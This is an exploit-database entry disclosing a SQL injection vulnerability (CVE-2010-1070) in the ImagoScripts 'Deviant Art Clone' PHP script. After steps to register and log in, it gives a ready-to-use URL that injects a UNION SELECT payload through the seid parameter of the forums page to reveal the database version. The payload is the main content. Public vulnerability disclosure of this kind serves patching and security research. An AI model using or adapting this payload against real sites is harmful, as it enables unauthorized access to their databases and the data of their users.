ImagoScripts Deviant Art Clone SQL Injection Vulnerability

EDB-ID: 11002 CVE: 2010-1070 OSVDB-ID: 61482
Verified: Author: alnjm33 Published: 2010-01-04
Download Exploit: Source Raw Download Vulnerable App: N/A
Exploit Title:ImagoScripts Deviant Art Clone SQL Injection Vulnerability
Date: 4/1/2010
Author: alnjm33
Software Link: http://imagoscripts.com/index.php?act=viewProd&productId=2 it cost 50$ :)
________________________
first join in site
site/path/index.php?mode=join
then log in
and this is exploit
site/path//index.php?mode=forums&act=viewcat&seid=-1/**/union/**/select 1,version(),3,4--